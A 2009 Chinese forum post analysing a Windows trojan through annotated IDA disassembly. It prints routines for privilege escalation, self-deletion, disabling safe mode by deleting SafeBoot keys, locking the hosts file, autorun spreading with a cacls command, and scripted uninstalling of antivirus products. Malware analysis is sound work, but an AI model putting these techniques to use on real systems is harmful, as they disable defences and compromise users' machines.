好友
阅读权限40
听众
最后登录1970-1-1
|
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
Hello,everyone!
近日老大给我布置了一篇家庭作业,我自然是不敢有半分懈怠,还正赶上老弟对一些木马常用的猥琐伎俩小有兴趣,我也想积累一些Win32汇编编程的经验,于是就抓了这个“小家伙”来玩玩了,从木马中学习编程和杀毒技术,也算是在小偷家里偷东西了吧*_0
小马一匹,什么功能并不是我们要关心的话题,我们主要来看看感兴趣的相关功能的实现代码,也好学习一下,积累编程经验嘛。分析起来很耗时,我们慢慢看吧,分析一些我就再补充一些 *^◎^*
提权:seg001:00406394 AdjustPrivilege proc near
seg001:00406394
seg001:00406394 push ebx
seg001:00406395 add esp, 0FFFFFFD0h
seg001:00406398 lea eax, [esp+30h+TokenHandle]
seg001:0040639C push eax ; TokenHandle
seg001:0040639D push 20h ; DesiredAccess
seg001:0040639F call GetCurrentProcess
seg001:0040639F
seg001:004063A4 push eax ; ProcessHandle
seg001:004063A5 call OpenProcessToken
seg001:004063A5
seg001:004063AA lea eax, [esp+30h+Luid]
seg001:004063AE push eax ; lpLuid
seg001:004063AF push offset Name ; "SeDebugPrivilege"
seg001:004063B4 push 0 ; lpSystemName
seg001:004063B6 call LookupPrivilegeValueA
seg001:004063B6
seg001:004063BB mov eax, [esp+30h+Luid.LowPart]
seg001:004063BF mov [esp+30h+NewState.Privileges.Luid.LowPart], eax
seg001:004063C3 mov eax, [esp+30h+Luid.HighPart]
seg001:004063C7 mov [esp+30h+NewState.Privileges.Luid.HighPart], eax
seg001:004063CB mov [esp+30h+NewState.PrivilegeCount], 1
seg001:004063D3 xor ebx, ebx
seg001:004063D5 mov [esp+30h+NewState.Privileges.Attributes], ebx
seg001:004063D9 push esp ; ReturnLength
seg001:004063DA lea eax, [esp+34h+PreviousState]
seg001:004063DE push eax ; PreviousState
seg001:004063DF push 10h ; BufferLength
seg001:004063E1 lea eax, [esp+3Ch+NewState]
seg001:004063E5 push eax ; NewState
seg001:004063E6 push 0 ; DisableAllPrivileges
seg001:004063E8 mov eax, [esp+44h+TokenHandle]
seg001:004063EC push eax ; TokenHandle
seg001:004063ED call AdjustTokenPrivileges
seg001:004063ED
seg001:004063F2 mov eax, [esp+30h+Luid.LowPart]
seg001:004063F6 mov [esp+30h+PreviousState.Privileges.Luid.LowPart], eax
seg001:004063FA mov eax, [esp+30h+Luid.HighPart]
seg001:004063FE mov [esp+30h+PreviousState.Privileges.Luid.HighPart], eax
seg001:00406402 mov [esp+30h+PreviousState.PrivilegeCount], 1
seg001:0040640A or ebx, 2
seg001:0040640D mov [esp+30h+PreviousState.Privileges.Attributes], ebx
seg001:00406411 push esp ; ReturnLength
seg001:00406412 push 0 ; PreviousState
seg001:00406414 mov eax, [esp+38h+BufferLength]
seg001:00406418 push eax ; BufferLength
seg001:00406419 lea eax, [esp+3Ch+PreviousState]
seg001:0040641D push eax ; NewState
seg001:0040641E push 0 ; DisableAllPrivileges
seg001:00406420 mov eax, [esp+44h+TokenHandle]
seg001:00406424 push eax ; TokenHandle
seg001:00406425 call AdjustTokenPrivileges
seg001:00406425
seg001:0040642A add esp, 30h
seg001:0040642D pop ebx
seg001:0040642E retn
seg001:0040642E
seg001:0040642E AdjustPrivilege endp
seg001:00406598 RegisterService proc near
seg001:00406598
seg001:00406598 add esp, 0FFFFFF6Ch
seg001:0040659E mov [esp+94h+var_94], 94h
seg001:004065A5 push esp ; lpVersionInformation
seg001:004065A6 call GetVersionExA
seg001:004065A6
seg001:004065AB cmp eax, 1
seg001:004065AE sbb eax, eax
seg001:004065B0 inc eax
seg001:004065B1 cmp al, 1
seg001:004065B3 jnz short loc_4065FE
seg001:004065B3
seg001:004065B5 cmp [esp+94h+var_84], 2
seg001:004065BA jz short loc_4065FE
seg001:004065BA
seg001:004065BC push offset s_Kernel32_dll ; "kernel32.dll"
seg001:004065C1 call LoadLibraryA
seg001:004065C1
seg001:004065C6 mov hModule, eax
seg001:004065CB cmp hModule, 0
seg001:004065D2 jz short loc_4065FE
seg001:004065D2
seg001:004065D4 push offset s_Registerservi ; "RegisterServiceProcess"
seg001:004065D9 mov eax, hModule
seg001:004065DE push eax ; hModule
seg001:004065DF call GetProcAddress
seg001:004065DF
seg001:004065E4 mov addr_RegisterServiceProcess, eax
seg001:004065E9 push 1
seg001:004065EB push 0
seg001:004065ED call addr_RegisterServiceProcess
seg001:004065F3 mov eax, hModule
seg001:004065F8 push eax ; hLibModule
seg001:004065F9 call FreeLibrary_0 ; "kernel32.dll"
seg001:004065F9
seg001:004065FE loc_4065FE:
seg001:004065FE add esp, 94h
seg001:00406604 retn
seg001:00406604
seg001:00406604 RegisterService endp
seg001:00406A70 del_self proc near
seg001:00406A70
seg001:00406A70 push ebp
seg001:00406A71 mov ebp, esp
seg001:00406A73 add esp, 0FFFFFEECh
seg001:00406A79 xor eax, eax
seg001:00406A7B mov [ebp+var_10C], eax
seg001:00406A81 mov [ebp+var_110], eax
seg001:00406A87 mov [ebp+var_114], eax
seg001:00406A8D xor eax, eax
seg001:00406A8F push ebp
seg001:00406A90 push offset sub_406B2B
seg001:00406A95 push dword ptr fs:[eax]
seg001:00406A98 mov fs:[eax], esp
seg001:00406A9B push 104h ; nSize
seg001:00406AA0 lea eax, [ebp+Buffer]
seg001:00406AA6 push eax ; lpBuffer
seg001:00406AA7 push offset s_Comspec ; "Comspec"
seg001:00406AAC call GetEnvironmentVariableA ; 获取环境变量,查找cmd.exe文件路径
seg001:00406AAC
seg001:00406AB1 push 0
seg001:00406AB3 lea eax, [ebp+var_110]
seg001:00406AB9 lea edx, [ebp+Buffer]
seg001:00406ABF mov ecx, 105h
seg001:00406AC4 call sub_403D34
seg001:00406AC4
seg001:00406AC9 push [ebp+var_110]
seg001:00406ACF push offset s_CDel ; " /c del ""
seg001:00406AD4 lea edx, [ebp+var_114]
seg001:00406ADA xor eax, eax
seg001:00406ADC call sub_402708 ; GetModuleFileNameA获取木马文件路径
seg001:00406ADC
seg001:00406AE1 push [ebp+var_114]
seg001:00406AE7 push offset dword_406B5C ; uCmdShow
seg001:00406AEC lea eax, [ebp+var_10C]
seg001:00406AF2 mov edx, 4
seg001:00406AF7 call sub_403E0C
seg001:00406AF7
seg001:00406AFC mov eax, [ebp+var_10C]
seg001:00406B02 call sub_403F4C
seg001:00406B02
seg001:00406B07 push eax ; lpCmdLine
seg001:00406B08 call WinExec ; 即 “cmd.exe /c del 木马本身路径”
seg001:00406B08
seg001:00406B0D xor eax, eax
seg001:00406B0F pop edx
seg001:00406B10 pop ecx
seg001:00406B11 pop ecx
seg001:00406B12 mov fs:[eax], edx
seg001:00406B15 push offset loc_406B32
seg001:00406B15
seg001:00406B1A loc_406B1A:
seg001:00406B1A lea eax, [ebp+var_114]
seg001:00406B20 mov edx, 3
seg001:00406B25 call sub_403BEC
seg001:00406B25
seg001:00406B2A retn
seg001:00409138 mov edx, offset s_DriversEtcHos ; "drivers\\etc\\hosts"
seg001:0040913D call sub_403D54
seg001:0040913D
seg001:00409142 mov eax, [ebp-0ACh]
seg001:00409148 call FindFile_AdjustFileTime ; 查找文件,若找到就修正文件时间(FindFirstFile/FileTimeToLocalFileTime/FileTimeToDosDateTime)
seg001:00409148
seg001:0040914D cmp al, 1
seg001:0040914F jnz short loc_409194
seg001:0040914F
seg001:00409151 lea eax, [ebp-0B4h]
seg001:00409157 call GetSystemDirectory
seg001:00409157
seg001:0040915C lea eax, [ebp-0B4h]
seg001:00409162 mov edx, offset s_DriversEtcHos ; "drivers\\etc\\hosts"
seg001:00409167 call sub_403D54
seg001:00409167
seg001:0040916C mov eax, [ebp-0B4h]
seg001:00409172 call sub_403F4C
seg001:00409172
seg001:00409177 mov edx, eax
seg001:00409179 lea eax, [ebp-0B0h]
seg001:0040917F call sub_403CF8
seg001:0040917F
seg001:00409184 mov eax, [ebp-0B0h]
seg001:0040918A mov edx, 10h
seg001:0040918F call sub_4066AC ; CreateFileA以独占方式打开文件,防修改
seg001:0040918F
seg001:00409194
seg001:00409194 loc_409194: ; CODE XREF: seg001:0040914F�j
seg001:00409194 lea eax, [ebp-0B8h]
seg001:0040919A call sub_406DEC
seg001:0040919A
seg001:0040919F lea eax, [ebp-0B8h]
seg001:004091A5 mov edx, offset s_Boot_ini ; "boot.ini"
seg001:004091AA call sub_403D54
seg001:004091AA
seg001:004091AF mov eax, [ebp-0B8h]
seg001:004091B5 call FindFile_AdjustFileTime ; 查找文件,若找到就修正文件时间(FindFirstFile/FileTimeToLocalFileTime/FileTimeToDosDateTime)
seg001:004091B5
seg001:004091BA cmp al, 1
seg001:004091BC jnz short loc_409201
seg001:004091BC
seg001:004091BE lea eax, [ebp-0C0h]
seg001:004091C4 call sub_406DEC
seg001:004091C4
seg001:004091C9 lea eax, [ebp-0C0h]
seg001:004091CF mov edx, offset s_Boot_ini ; "boot.ini"
seg001:004091D4 call sub_403D54
seg001:004091D4
seg001:004091D9 mov eax, [ebp-0C0h]
seg001:004091DF call sub_403F4C
seg001:004091DF
seg001:004091E4 mov edx, eax
seg001:004091E6 lea eax, [ebp-0BCh]
seg001:004091EC call sub_403CF8
seg001:004091EC
seg001:004091F1 mov eax, [ebp-0BCh]
seg001:004091F7 mov edx, 10h
seg001:004091FC call sub_4066AC ; 独占方式打开文件,防修改
HKEY_LOCAL_MACHINE SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKEY_LOCAL_MACHINE SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKEY_LOCAL_MACHINE SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKEY_LOCAL_MACHINE SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}seg001:0040C6FF Del_Key:
seg001:0040C6FF mov ecx, offset s_4d36e967-e325 ; "{4D36E967-E325-11CE-BFC1-08002BE10318}"
seg001:0040C704 mov edx, offset s_SystemCurre_5 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
seg001:0040C709 mov eax, 80000002h
seg001:0040C70E call near ptr s_L_LxRulBSvw3I+0Ah
seg001:0040C70E
seg001:0040C713 cmp al, 1
seg001:0040C715 jnz short loc_40C726
seg001:0040C715
seg001:0040C717 mov edx, offset s_SystemCurre_6 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
seg001:0040C71C mov eax, 80000002h
seg001:0040C721 call RegDeleteKey ; 删除相关键值
seg001:0040C721
seg001:0040C726 Del_Key:
seg001:0040C726 mov ecx, offset s_4d36e967-e325 ; "{4D36E967-E325-11CE-BFC1-08002BE10318}"
seg001:0040C72B mov edx, offset s_SystemCurre_7 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
seg001:0040C730 mov eax, 80000002h
seg001:0040C735 call near ptr s_L_LxRulBSvw3I+0Ah
seg001:0040C735
seg001:0040C73A cmp al, 1
seg001:0040C73C jnz short loc_40C74D
seg001:0040C73C
seg001:0040C73E mov edx, offset s_SystemCurre_8 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
seg001:0040C743 mov eax, 80000002h
seg001:0040C748 call RegDeleteKey
HKEY_LOCAL_MACHINE SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Optionsseg001:0040C76C mov edx, offset s_SoftwareMic_7 ; Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
seg001:0040C771 mov eax, 80000002h
seg001:0040C776 call near ptr s_L_LxRulBSvw3I+0Ah
seg001:0040C776
seg001:0040C77B cmp al, 1
seg001:0040C77D jnz short loc_40C7AA
seg001:0040C77D
seg001:0040C77F push offset s_SoftwareMic_8 ; Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
seg001:0040C784 mov eax, off_41356C
seg001:0040C789 push dword ptr [eax]
seg001:0040C78B push offset dword_40C884
seg001:0040C790 lea eax, [ebp+var_80]
seg001:0040C793 mov edx, 3
seg001:0040C798 call sub_403E0C
seg001:0040C798
seg001:0040C79D mov edx, [ebp+var_80]
seg001:0040C7A0 mov eax, 80000002h
seg001:0040C7A5 call RegDeleteKey
seg001:0040A080 push edi ; phkResult
seg001:0040A081 push offset s_SystemContr_1 ; SYSTEM\ControlSet001\Control\StorageDevicePolicies
seg001:0040A086 push 80000002h ; hKey
seg001:0040A08B call RegOpenKeyA
seg001:0040A08B
seg001:0040A090 push 4 ; cbData
seg001:0040A092 lea eax, [ebp+Data]
seg001:0040A095 push eax ; lpData
seg001:0040A096 push 4 ; dwType
seg001:0040A098 push 0 ; Reserved
seg001:0040A09A push offset s_Writeprotect ; "WriteProtect"
seg001:0040A09F mov eax, [edi]
seg001:0040A0A1 push eax ; hKey
seg001:0040A0A2 call RegSetValueExA
seg001:0040A0A2
seg001:0040A0A7 mov eax, [edi]
seg001:0040A0A9 push eax ; hKey
seg001:0040A0AA call RegCloseKey_0
seg001:0040A0AA
seg001:0040A0AF xor eax, eax
seg001:0040A0B1 mov dword ptr [ebp+Data], eax
seg001:0040A0B4 push edi ; phkResult
seg001:0040A0B5 push offset s_SoftwareMic_4 ; Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
seg001:0040A0BA push 80000001h ; hKey
seg001:0040A0BF call RegOpenKeyA
seg001:0040A0BF
seg001:0040A0C4 push 4 ; cbData
seg001:0040A0C6 lea eax, [ebp+Data]
seg001:0040A0C9 push eax ; lpData
seg001:0040A0CA push 4 ; dwType
seg001:0040A0CC push 0 ; Reserved
seg001:0040A0CE push offset s_Showsuperhidd ; "ShowSuperHidden"
seg001:0040A0D3 mov eax, [edi]
seg001:0040A0D5 push eax ; hKey
seg001:0040A0D6 call RegSetValueExA
seg001:0040A0D6
seg001:0040A0DB mov eax, [edi]
seg001:0040A0DD push eax ; hKey
seg001:0040A0DE call RegCloseKey_0
seg001:0040A0DE
seg001:0040A0E3 mov dword ptr [ebp+Data], 91h
seg001:0040A0EA push edi ; phkResult
seg001:0040A0EB push offset s_SoftwareMic_5 ; SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
seg001:0040A0F0 push 80000002h ; hKey
seg001:0040A0F5 call RegOpenKeyA
seg001:0040A0F5
seg001:0040A0FA push 4 ; cbData
seg001:0040A0FC lea eax, [ebp+Data]
seg001:0040A0FF push eax ; lpData
seg001:0040A100 push 4 ; dwType
seg001:0040A102 push 0 ; Reserved
seg001:0040A104 push offset s_Nodrivetypeau ; "NoDriveTypeAutoRun"
seg001:0040A109 mov eax, [edi]
seg001:0040A10B push eax ; hKey
seg001:0040A10C call RegSetValueExA
seg001:0040A10C
seg001:0040A111 mov eax, [edi]
seg001:0040A113 push eax ; hKey
seg001:0040A114 call RegCloseKey_0
......
在Windows 2000/XP/Server 2003里面,软件厂商在碰到文件被占用无法马上替换或者删除问题的时候,都会使用MoveFileEx API函数让系统在注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager Value:PendingFileRenameOperations键值下面建立一个延迟删除列表,系统在下次启动的时候,CSRSS.EXE进程将根据这个列表对文件进行延迟更新或者延迟删除操作。
PendingFileRenameOperations是一个REG_MULTI_SZ类型的注册表键值,不能直接通过注册表编辑器编辑,否则会造成延迟删除列表被破坏。要查看这个键值的内容,可以使用注册表编辑器或者专用注册表操作工具。Windows XP在安装完需要重启的补丁以后就是利用PendingFileRenameOperations控制被占用文件进行被占用文件的升级和删除操作的。seg001:00409CF3 mov ecx, offset s_Pendingfilere ; "PendingFileRenameOperations"
seg001:00409CF8 mov edx, offset s_SystemCurrent ; SYSTEM\CurrentControlSet\Control\Session Manager
seg001:00409CFD mov eax, 80000002h
seg001:00409D02 call sub_408150
seg001:00409D02
......
seg001:00409DF9 push 4 ; dwFlags
seg001:00409DFB push 0 ; lpNewFileName
seg001:00409DFD lea eax, [ebp+var_28C]
seg001:00409E03 call GetSystemDirectory
seg001:00409E03
seg001:00409E08 lea eax, [ebp+var_28C]
seg001:00409E0E mov edx, offset s_Ravext_dll ; "RavExt.dll"
seg001:00409E13 call sub_403D54
seg001:00409E13
seg001:00409E18 mov eax, [ebp+var_28C]
seg001:00409E1E call sub_403F4C
seg001:00409E1E
seg001:00409E23 push eax ; lpExistingFileName
seg001:00409E24 call MoveFileExA
seg001:00409E24
seg001:00409E29 push 4 ; dwFlags
seg001:00409E2B push 0 ; lpNewFileName
seg001:00409E2D lea eax, [ebp+var_290]
seg001:00409E33 call GetSystemDirectory
seg001:00409E33
seg001:00409E38 lea eax, [ebp+var_290]
seg001:00409E3E mov edx, offset s_Bsmain_exe ; "bsmain.exe"
seg001:00409E43 call sub_403D54
seg001:00409E43
seg001:00409E48 mov eax, [ebp+var_290]
seg001:00409E4E call sub_403F4C
seg001:00409E4E
seg001:00409E53 push eax ; lpExistingFileName
seg001:00409E54 call MoveFileExA
使用命令行工具cacls.exe来提高everyone用户对文件autorun.inf的控制权限
CACLS filename [/T] [/E] [/C] [/G user:perm]
显示或者修改文件的访问控制表(ACL)
filename 显示 ACL。
/T 更改当前目录及其所有子目录中指定文件的 ACL。
/G user:perm 赋予指定用户访问权限。
Perm 可以是: R 读取
W 写入
C 更改(写入)
F 完全控制seg001:0040D15D mov eax, [ebp+var_4]
seg001:0040D160 call GetVolumeInformation
seg001:0040D160
seg001:0040D165 mov eax, [ebp+var_27C]
seg001:0040D16B mov edx, offset s_Ntfs ; "NTFS"
seg001:0040D170 call sub_403E98
seg001:0040D170
seg001:0040D175 jnz short loc_40D1B1
seg001:0040D175
seg001:0040D177 push 0
seg001:0040D179 push offset s_CmdCEchoYCacl ; "cmd /c echo Y| cacls "
seg001:0040D17E push [ebp+var_4]
seg001:0040D181 push offset s_Autorun_infTG ; "autorun.inf /t /g everyone:F"
seg001:0040D186 lea eax, [ebp+var_280]
seg001:0040DAB4 KillDuBa proc near ; DATA XREF: start+1126�o
seg001:0040DAB4 push ebx
seg001:0040DAB5 push offset s_2008 ; "金山毒霸 2008 杀毒套装卸载程序"
seg001:0040DABA push offset s_32770_1 ; "#32770"
seg001:0040DABF call FindWindowA
seg001:0040DABF
seg001:0040DAC4 mov ebx, eax
seg001:0040DAC6 push offset s_N> ; "下一步(&N) >"
seg001:0040DACB push offset s_Button_0 ; "Button"
seg001:0040DAD0 push 0 ; HWND
seg001:0040DAD2 push ebx ; HWND
seg001:0040DAD3 call FindWindowExA
seg001:0040DAD3
seg001:0040DAD8 mov ebx, eax
seg001:0040DADA push 0 ; lParam
seg001:0040DADC push 0 ; wParam
seg001:0040DADE push 0F5h ; Msg
seg001:0040DAE3 push ebx ; hWnd
seg001:0040DAE4 call SendMessageA
seg001:0040DAE4
seg001:0040DAE9 push 0 ; lParam
seg001:0040DAEB push 0 ; wParam
seg001:0040DAED push 0F5h ; Msg
seg001:0040DAF2 push ebx ; hWnd
seg001:0040DAF3 call SendMessageA
seg001:0040DAF3
seg001:0040DAF8 push 320h ; dwMilliseconds
seg001:0040DAFD call Sleep
seg001:0040DAFD
seg001:0040DB02 push offset s_2008 ; "金山毒霸 2008 杀毒套装卸载程序"
seg001:0040DB07 push offset s_32770_1 ; "#32770"
seg001:0040DB0C call FindWindowA
seg001:0040DB0C
seg001:0040DB11 mov ebx, eax
seg001:0040DB13 push offset s_U ; "卸载(&U)"
seg001:0040DB18 push offset s_Button_0 ; "Button"
seg001:0040DB1D push 0 ; HWND
seg001:0040DB1F push ebx ; HWND
seg001:0040DB20 call FindWindowExA
seg001:0040DB20
seg001:0040DB25 mov ebx, eax
seg001:0040DB27 push 0 ; lParam
seg001:0040DB29 push 0 ; wParam
seg001:0040DB2B push 0F5h ; Msg
seg001:0040DB30 push ebx ; hWnd
seg001:0040DB31 call SendMessageA
seg001:0040DB31
seg001:0040DB36 push 0 ; lParam
seg001:0040DB38 push 0 ; wParam
seg001:0040DB3A push 0F5h ; Msg
seg001:0040DB3F push ebx ; hWnd
seg001:0040DB40 call SendMessageA
seg001:0040DB40
seg001:0040DB45 push 0BB8h ; dwMilliseconds
seg001:0040DB4A call Sleep
seg001:0040DB4A
seg001:0040DB4F push 0 ; lpWindowName
seg001:0040DB51 push offset s_Ieframe_0 ; "IEFrame"
seg001:0040DB56 call FindWindowA
seg001:0040DB56
seg001:0040DB5B mov ebx, eax
seg001:0040DB5D push 1 ; lParam
seg001:0040DB5F push 0F060h ; wParam
seg001:0040DB64 push 112h ; Msg
seg001:0040DB69 push ebx ; hWnd
seg001:0040DB6A call SendMessageA
seg001:0040DB6A
seg001:0040DB6F pop ebx
seg001:0040DB70 retn
seg001:0040DB70
seg001:0040DB70 KillDuBa endp
命令行模式:
A ——添加文件到压缩包
-ep ——添加文件时不包含路径信息
-u ——更新文件
-inul ——禁止错误提示信息seg001:0040F7E6 push 0
seg001:0040F7E8 push dword_4149D4
seg001:0040F7EE push offset s_Winrar_exeA-e ; "\\WinRAR.exe a -ep -u -inul "
seg001:0040F7F3 push dword_4149D0
seg001:0040F7F9 push offset dword_40FF5C
seg001:0040F7FE push [ebp+uCmdShow] ; uCmdShow
seg001:0040F801 lea eax, [ebp+var_1F4]
seg001:0040F807 mov edx, 5
seg001:0040F80C call sub_403E0C
seg001:0040F80C
seg001:0040F811 mov eax, [ebp+var_1F4]
seg001:0040F817 call sub_403F4C
seg001:0040F817
seg001:0040F81C push eax ; lpCmdLine
seg001:0040F81D call WinExec
seg001:0041129F mov eax, offset s_Ravmon_exe ; "RavMon.exe"
seg001:004112A4 call sub_4076E8
seg001:004112A4
seg001:004112A9 cmp al, 1
seg001:004112AB jnz loc_411387
seg001:004112AB
seg001:004112B1 lea eax, [ebp+var_1D0]
seg001:004112B7 push eax
seg001:004112B8 mov ecx, offset s_Installpath ; "installpath"
seg001:004112BD mov edx, offset s_SoftwareRisin ; "SOFTWARE\\rising\\Rav"
seg001:004112C2 mov eax, 80000002h
seg001:004112C7 call RegQueryValue
......
seg001:004112D7
seg001:004112DC push 0 ; dwExtraInfo
seg001:004112DE push 0 ; dwFlags
seg001:004112E0 push 0 ; uMapType
seg001:004112E2 push 5Bh ; uCode 5Bh微软左徽标键
seg001:004112E4 call MapVirtualKeyA
seg001:004112E4
seg001:004112E9 push eax ; bScan
seg001:004112EA push 5Bh ; bVk
seg001:004112EC call keybd_event
seg001:004112EC
seg001:004112F1 push 0 ; dwExtraInfo
seg001:004112F3 push 0 ; dwFlags
seg001:004112F5 push 0 ; uMapType
seg001:004112F7 push 4Dh ; uCode 4Dh是"M"
seg001:004112F9 call MapVirtualKeyA
......
seg001:0041132B
seg001:00411330 push 1 ; uCmdShow
seg001:00411332 mov edx, off_413554
seg001:00411338 mov edx, [edx]
seg001:0041133A lea eax, [ebp+var_1D4]
seg001:00411340 mov ecx, offset s_UpdateSetup_e ; "\\Update\\setup.exe"
seg001:00411345 call sub_403D98
seg001:00411345
seg001:0041134A mov eax, [ebp+var_1D4]
seg001:00411350 call sub_403F4C
seg001:00411350
seg001:00411355 push eax ; lpCmdLine
seg001:00411356 call WinExec
seg001:00411356
seg001:0041135B push 5DCh ; dwMilliseconds
seg001:00411360 call Sleep
seg001:00411360
seg001:00411365 mov eax, lpThreadId
seg001:0041136A push eax ; lpThreadId
seg001:0041136B push 0 ; dwCreationFlags
seg001:0041136D push 0 ; lpParameter
seg001:0041136F push offset sub_40DBC8 ; lpStartAddress
seg001:00411374 push 0 ; dwStackSize
seg001:00411376 push 0 ; lpThreadAttributes
seg001:00411378 call CreateThread
seg001:00411378
seg001:0041137D push 0DACh ; dwMilliseconds
seg001:00411382 call Sleep
seg001:00411382
seg001:00411387
seg001:00411387 loc_411387: ; CODE XREF: start+E47�j
seg001:00411387 mov eax, offset s_Avp_exe ; "avp.exe"
seg001:0041138C call sub_4076E8
seg001:0041138C
seg001:00411391 cmp al, 1
seg001:00411393 jnz uninstall
......
|
免费评分
-
查看全部评分
|
[复制链接]
发表于 2009-2-6 08:18
发表于 2009-2-6 08:33
发表于 2009-2-6 08:45
|
发表于 2009-2-6 12:31
